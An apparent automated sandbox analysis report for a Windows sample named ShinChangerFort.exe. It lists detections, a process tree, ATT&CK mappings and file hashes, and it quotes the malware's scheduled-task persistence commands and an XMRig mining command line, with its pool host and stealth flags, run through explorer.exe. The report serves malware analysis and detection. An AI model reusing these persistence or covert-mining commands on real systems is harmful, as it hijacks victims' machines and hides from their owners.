Analysis

  • max time kernel
    149s
  • max time network
    147s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    16-10-2021 14:06

General

  • Target

    ShinChangerFort.exe

  • Size

    3.1MB

  • MD5

    9160e2fa867538422a7d9f3d948e91c5

  • SHA1

    9751ad4f294ff8d7c067378f09288e7d142ee3ae

  • SHA256

    0f072c9ed41be4f8a023d20af8e0a49f432a27e74e79cfb434270c0c87ea9e85

  • SHA512

    2451a4448020842f017bb330c456529c5369d831021cbceffc832668f76b3f15aef706378695800877a6c6fc0d5df90d469f2eb1d8c395c8dd6613a24ab42714

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • XMRig Miner Payload 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 7 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ShinChangerFort.exe
    "C:\Users\Admin\AppData\Local\Temp\ShinChangerFort.exe"
    1⤵
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3524
    • C:\Users\Admin\AppData\Local\Temp\fl.exe
      "C:\Users\Admin\AppData\Local\Temp\fl.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:364
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\f1_prot.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\f1_prot.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1404
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3164
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
            5⤵
            • Creates scheduled task(s)
            PID:4876
        • C:\Users\Admin\AppData\Local\Temp\services64.exe
          "C:\Users\Admin\AppData\Local\Temp\services64.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4928
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1508
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
              6⤵
              • Creates scheduled task(s)
              PID:1744
          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
            "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
            5⤵
            • Executes dropped EXE
            PID:1180
          • C:\Windows\explorer.exe
            C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=prohashing.com:3359 --user=fentdev --pass=a=randomx --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=1 --cinit-idle-cpu=60 --cinit-stealth
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2100
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2_prot.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2_prot.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1148
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1000
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"'
            5⤵
            • Creates scheduled task(s)
            PID:4992
        • C:\Users\Admin\AppData\Local\Temp\services32.exe
          "C:\Users\Admin\AppData\Local\Temp\services32.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1240
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"' & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3648
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"'
              6⤵
              • Creates scheduled task(s)
              PID:3824
          • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
            "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
            5⤵
            • Executes dropped EXE
            PID:2248

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Virtualization/Sandbox Evasion

1
T1497

Credential Access

Credentials in Files

2
T1081

Discovery

Query Registry

3
T1012

Virtualization/Sandbox Evasion

1
T1497

System Information Discovery

3
T1082

Collection

Data from Local System

2
T1005

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\f1_prot.exe
    MD5

    b9bedc94ab68cf2423606bab657fe343

    SHA1

    f9d3fe51e13db292ba1954cfb9238973de62beea

    SHA256

    334576e834d0516e3ee15f1ebe5fe454c6617066f1becb047df8ad6cc47bd479

    SHA512

    8d9fd056dc30a590403fb9829717cae57b0b56258f34ce3aac8ba0056f7a8df4725dc035946f542f37142f8331e0da0c7cda3980fa1d74f883deaaaa3372bac2

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\f1_prot.exe
    MD5

    b9bedc94ab68cf2423606bab657fe343

    SHA1

    f9d3fe51e13db292ba1954cfb9238973de62beea

    SHA256

    334576e834d0516e3ee15f1ebe5fe454c6617066f1becb047df8ad6cc47bd479

    SHA512

    8d9fd056dc30a590403fb9829717cae57b0b56258f34ce3aac8ba0056f7a8df4725dc035946f542f37142f8331e0da0c7cda3980fa1d74f883deaaaa3372bac2

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2_prot.exe
    MD5

    a21c6db90ee62cc05755c7aba5bfb33b

    SHA1

    0a39285f50527fd028eb81016f20a0a597afa24b

    SHA256

    81eccb7c63167508f91b8e2ea24d9437a9579411edd0f6f666bda1051a4cd9ee

    SHA512

    a0fdc95185e1a87428788aa10cfc70a2da671e063131c00db5e401f40bbc72a3cd302620f2c1296c4dffaba4e3819c999f0261887b68a3de8dcbd3a5762a8e35

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2_prot.exe
    MD5

    a21c6db90ee62cc05755c7aba5bfb33b

    SHA1

    0a39285f50527fd028eb81016f20a0a597afa24b

    SHA256

    81eccb7c63167508f91b8e2ea24d9437a9579411edd0f6f666bda1051a4cd9ee

    SHA512

    a0fdc95185e1a87428788aa10cfc70a2da671e063131c00db5e401f40bbc72a3cd302620f2c1296c4dffaba4e3819c999f0261887b68a3de8dcbd3a5762a8e35

  • C:\Users\Admin\AppData\Local\Temp\fl.exe
    MD5

    8b1011bf4b9dc38d8aececd4ed9e11c6

    SHA1

    9d04f1d07eb61b8cd6ae26be619b409ba0581ede

    SHA256

    5db7ad7b3b345ecb7da30349183fafaf4a7bbd4e566e4d7ea4c0e6d895d983d2

    SHA512

    9be022599d6348b32facef0e1dd54a02b959594c362e5d76bae8e20ba51aee53732273801efc8fb28c587036667cad34cea03068d02495aa6ec7892be9202d73

  • C:\Users\Admin\AppData\Local\Temp\fl.exe
    MD5

    8b1011bf4b9dc38d8aececd4ed9e11c6

    SHA1

    9d04f1d07eb61b8cd6ae26be619b409ba0581ede

    SHA256

    5db7ad7b3b345ecb7da30349183fafaf4a7bbd4e566e4d7ea4c0e6d895d983d2

    SHA512

    9be022599d6348b32facef0e1dd54a02b959594c362e5d76bae8e20ba51aee53732273801efc8fb28c587036667cad34cea03068d02495aa6ec7892be9202d73

  • C:\Users\Admin\AppData\Local\Temp\services32.exe
    MD5

    a21c6db90ee62cc05755c7aba5bfb33b

    SHA1

    0a39285f50527fd028eb81016f20a0a597afa24b

    SHA256

    81eccb7c63167508f91b8e2ea24d9437a9579411edd0f6f666bda1051a4cd9ee

    SHA512

    a0fdc95185e1a87428788aa10cfc70a2da671e063131c00db5e401f40bbc72a3cd302620f2c1296c4dffaba4e3819c999f0261887b68a3de8dcbd3a5762a8e35

  • C:\Users\Admin\AppData\Local\Temp\services32.exe
    MD5

    a21c6db90ee62cc05755c7aba5bfb33b

    SHA1

    0a39285f50527fd028eb81016f20a0a597afa24b

    SHA256

    81eccb7c63167508f91b8e2ea24d9437a9579411edd0f6f666bda1051a4cd9ee

    SHA512

    a0fdc95185e1a87428788aa10cfc70a2da671e063131c00db5e401f40bbc72a3cd302620f2c1296c4dffaba4e3819c999f0261887b68a3de8dcbd3a5762a8e35

  • C:\Users\Admin\AppData\Local\Temp\services64.exe
    MD5

    b9bedc94ab68cf2423606bab657fe343

    SHA1

    f9d3fe51e13db292ba1954cfb9238973de62beea

    SHA256

    334576e834d0516e3ee15f1ebe5fe454c6617066f1becb047df8ad6cc47bd479

    SHA512

    8d9fd056dc30a590403fb9829717cae57b0b56258f34ce3aac8ba0056f7a8df4725dc035946f542f37142f8331e0da0c7cda3980fa1d74f883deaaaa3372bac2

  • C:\Users\Admin\AppData\Local\Temp\services64.exe
    MD5

    b9bedc94ab68cf2423606bab657fe343

    SHA1

    f9d3fe51e13db292ba1954cfb9238973de62beea

    SHA256

    334576e834d0516e3ee15f1ebe5fe454c6617066f1becb047df8ad6cc47bd479

    SHA512

    8d9fd056dc30a590403fb9829717cae57b0b56258f34ce3aac8ba0056f7a8df4725dc035946f542f37142f8331e0da0c7cda3980fa1d74f883deaaaa3372bac2

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    5a9eee34a0fdce1056388e807726a03c

    SHA1

    c6b401b54e262651c2b70f7c9093c7ac3e57456b

    SHA256

    116afa6b8f4213f676cc6aab6b5aec7b6547ae53cd38df09974ea1462ce41954

    SHA512

    747db9d43151a5c833a64cdfbdb39648a305504b5abbe1bb9fa0e31975cf38d708a5ddbc5f0b67b2df0fdeca20acff6b74305edef2af3371c48e73cb6e7a0184

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    5a9eee34a0fdce1056388e807726a03c

    SHA1

    c6b401b54e262651c2b70f7c9093c7ac3e57456b

    SHA256

    116afa6b8f4213f676cc6aab6b5aec7b6547ae53cd38df09974ea1462ce41954

    SHA512

    747db9d43151a5c833a64cdfbdb39648a305504b5abbe1bb9fa0e31975cf38d708a5ddbc5f0b67b2df0fdeca20acff6b74305edef2af3371c48e73cb6e7a0184

  • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
    MD5

    ef1d47ed149037d47b6fea6dad01950b

    SHA1

    df39278003c6a9bb3c8e8c420f39faf2aa953f07

    SHA256

    201582c2837f6d4f8100fb3bf7fca50914cbe90a1a9c674641f1b353e18f7359

    SHA512

    3e6760a74f41538ffdc0b8c3f92faa9ce8bdd06f0aa254e12533786b21b5dd80d2943a06a830b0c2f3c7cf42a43651542eb540c0805cfe31bd8499c7316d8676

  • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
    MD5

    ef1d47ed149037d47b6fea6dad01950b

    SHA1

    df39278003c6a9bb3c8e8c420f39faf2aa953f07

    SHA256

    201582c2837f6d4f8100fb3bf7fca50914cbe90a1a9c674641f1b353e18f7359

    SHA512

    3e6760a74f41538ffdc0b8c3f92faa9ce8bdd06f0aa254e12533786b21b5dd80d2943a06a830b0c2f3c7cf42a43651542eb540c0805cfe31bd8499c7316d8676

  • memory/364-138-0x0000000002AA0000-0x0000000002AA1000-memory.dmp
    Filesize

    4KB

  • memory/364-135-0x0000000000000000-mapping.dmp
  • memory/364-137-0x0000000002AA0000-0x0000000002AA1000-memory.dmp
    Filesize

    4KB

  • memory/1000-249-0x0000000000000000-mapping.dmp
  • memory/1148-243-0x00007FFDB7860000-0x00007FFDB7870000-memory.dmp
    Filesize

    64KB

  • memory/1148-181-0x0000000000000000-mapping.dmp
  • memory/1148-258-0x0000000003060000-0x0000000003062000-memory.dmp
    Filesize

    8KB

  • memory/1180-259-0x0000000002B70000-0x0000000002B72000-memory.dmp
    Filesize

    8KB

  • memory/1180-250-0x0000000000000000-mapping.dmp
  • memory/1240-264-0x0000000000000000-mapping.dmp
  • memory/1240-298-0x00007FFDB7860000-0x00007FFDB7870000-memory.dmp
    Filesize

    64KB

  • memory/1240-307-0x000000001C9D0000-0x000000001C9D2000-memory.dmp
    Filesize

    8KB

  • memory/1404-162-0x00007FFDB7830000-0x00007FFDB7840000-memory.dmp
    Filesize

    64KB

  • memory/1404-144-0x00007FFDB7830000-0x00007FFDB7840000-memory.dmp
    Filesize

    64KB

  • memory/1404-146-0x00007FFDB7830000-0x00007FFDB7840000-memory.dmp
    Filesize

    64KB

  • memory/1404-147-0x00007FFDB7830000-0x00007FFDB7840000-memory.dmp
    Filesize

    64KB

  • memory/1404-148-0x00007FFDB7830000-0x00007FFDB7840000-memory.dmp
    Filesize

    64KB

  • memory/1404-149-0x00007FFDB7830000-0x00007FFDB7840000-memory.dmp
    Filesize

    64KB

  • memory/1404-151-0x00007FFDB7830000-0x00007FFDB7840000-memory.dmp
    Filesize

    64KB

  • memory/1404-150-0x00007FFDB7830000-0x00007FFDB7840000-memory.dmp
    Filesize

    64KB

  • memory/1404-152-0x00007FFDB7830000-0x00007FFDB7840000-memory.dmp
    Filesize

    64KB

  • memory/1404-153-0x00007FFDB7830000-0x00007FFDB7840000-memory.dmp
    Filesize

    64KB

  • memory/1404-154-0x00007FFDB7830000-0x00007FFDB7840000-memory.dmp
    Filesize

    64KB

  • memory/1404-155-0x00007FFDB7830000-0x00007FFDB7840000-memory.dmp
    Filesize

    64KB

  • memory/1404-156-0x00007FFDB7830000-0x00007FFDB7840000-memory.dmp
    Filesize

    64KB

  • memory/1404-157-0x00007FFDB7830000-0x00007FFDB7840000-memory.dmp
    Filesize

    64KB

  • memory/1404-158-0x00007FFDB7830000-0x00007FFDB7840000-memory.dmp
    Filesize

    64KB

  • memory/1404-160-0x00007FFDB7830000-0x00007FFDB7840000-memory.dmp
    Filesize

    64KB

  • memory/1404-159-0x00007FFDB7830000-0x00007FFDB7840000-memory.dmp
    Filesize

    64KB

  • memory/1404-161-0x00007FFDB7830000-0x00007FFDB7840000-memory.dmp
    Filesize

    64KB

  • memory/1404-140-0x0000000000000000-mapping.dmp
  • memory/1404-163-0x00007FFDB7830000-0x00007FFDB7840000-memory.dmp
    Filesize

    64KB

  • memory/1404-164-0x00007FFDB7830000-0x00007FFDB7840000-memory.dmp
    Filesize

    64KB

  • memory/1404-165-0x00007FFDB7830000-0x00007FFDB7840000-memory.dmp
    Filesize

    64KB

  • memory/1404-166-0x00007FFDB7830000-0x00007FFDB7840000-memory.dmp
    Filesize

    64KB

  • memory/1404-167-0x00007FFDB7830000-0x00007FFDB7840000-memory.dmp
    Filesize

    64KB

  • memory/1404-168-0x00007FFDB7830000-0x00007FFDB7840000-memory.dmp
    Filesize

    64KB

  • memory/1404-170-0x00007FF7E8290000-0x00007FF7E8291000-memory.dmp
    Filesize

    4KB

  • memory/1404-172-0x00007FFDB7860000-0x00007FFDB7870000-memory.dmp
    Filesize

    64KB

  • memory/1404-173-0x0000000002CD0000-0x0000000002CD9000-memory.dmp
    Filesize

    36KB

  • memory/1404-174-0x0000000003740000-0x0000000003741000-memory.dmp
    Filesize

    4KB

  • memory/1404-145-0x00007FFDB7830000-0x00007FFDB7840000-memory.dmp
    Filesize

    64KB

  • memory/1404-143-0x00007FFDB7830000-0x00007FFDB7840000-memory.dmp
    Filesize

    64KB

  • memory/1404-177-0x0000000003800000-0x0000000003802000-memory.dmp
    Filesize

    8KB

  • memory/1508-248-0x0000000000000000-mapping.dmp
  • memory/1744-255-0x0000000000000000-mapping.dmp
  • memory/2100-311-0x00000000001D0000-0x00000000001F0000-memory.dmp
    Filesize

    128KB

  • memory/2100-308-0x00000000001B0000-0x00000000001D0000-memory.dmp
    Filesize

    128KB

  • memory/2100-263-0x0000000140000000-0x0000000140786000-memory.dmp
    Filesize

    7.5MB

  • memory/2100-261-0x000000014030F3F8-mapping.dmp
  • memory/2248-309-0x000000001CA70000-0x000000001CA72000-memory.dmp
    Filesize

    8KB

  • memory/2248-302-0x0000000000000000-mapping.dmp
  • memory/3164-175-0x0000000000000000-mapping.dmp
  • memory/3524-127-0x0000000006F90000-0x0000000006F91000-memory.dmp
    Filesize

    4KB

  • memory/3524-120-0x0000000076F80000-0x000000007710E000-memory.dmp
    Filesize

    1.6MB

  • memory/3524-129-0x0000000006E40000-0x0000000006E41000-memory.dmp
    Filesize

    4KB

  • memory/3524-128-0x0000000007690000-0x0000000007691000-memory.dmp
    Filesize

    4KB

  • memory/3524-131-0x00000000080C0000-0x00000000080C1000-memory.dmp
    Filesize

    4KB

  • memory/3524-117-0x0000000000290000-0x0000000000291000-memory.dmp
    Filesize

    4KB

  • memory/3524-134-0x0000000007600000-0x0000000007601000-memory.dmp
    Filesize

    4KB

  • memory/3524-119-0x0000000003400000-0x0000000003401000-memory.dmp
    Filesize

    4KB

  • memory/3524-126-0x0000000005750000-0x0000000005751000-memory.dmp
    Filesize

    4KB

  • memory/3524-133-0x0000000007540000-0x0000000007541000-memory.dmp
    Filesize

    4KB

  • memory/3524-132-0x0000000007300000-0x0000000007301000-memory.dmp
    Filesize

    4KB

  • memory/3524-125-0x0000000005710000-0x0000000005711000-memory.dmp
    Filesize

    4KB

  • memory/3524-124-0x0000000005820000-0x0000000005821000-memory.dmp
    Filesize

    4KB

  • memory/3524-123-0x0000000005670000-0x0000000005671000-memory.dmp
    Filesize

    4KB

  • memory/3524-122-0x0000000005D20000-0x0000000005D21000-memory.dmp
    Filesize

    4KB

  • memory/3524-121-0x0000000005700000-0x0000000005701000-memory.dmp
    Filesize

    4KB

  • memory/3524-130-0x0000000007160000-0x0000000007161000-memory.dmp
    Filesize

    4KB

  • memory/3648-301-0x0000000000000000-mapping.dmp
  • memory/3824-310-0x0000000000000000-mapping.dmp
  • memory/4876-176-0x0000000000000000-mapping.dmp
  • memory/4928-242-0x00007FFDB7860000-0x00007FFDB7870000-memory.dmp
    Filesize

    64KB

  • memory/4928-178-0x0000000000000000-mapping.dmp
  • memory/4928-257-0x0000000004030000-0x0000000004032000-memory.dmp
    Filesize

    8KB

  • memory/4992-256-0x0000000000000000-mapping.dmp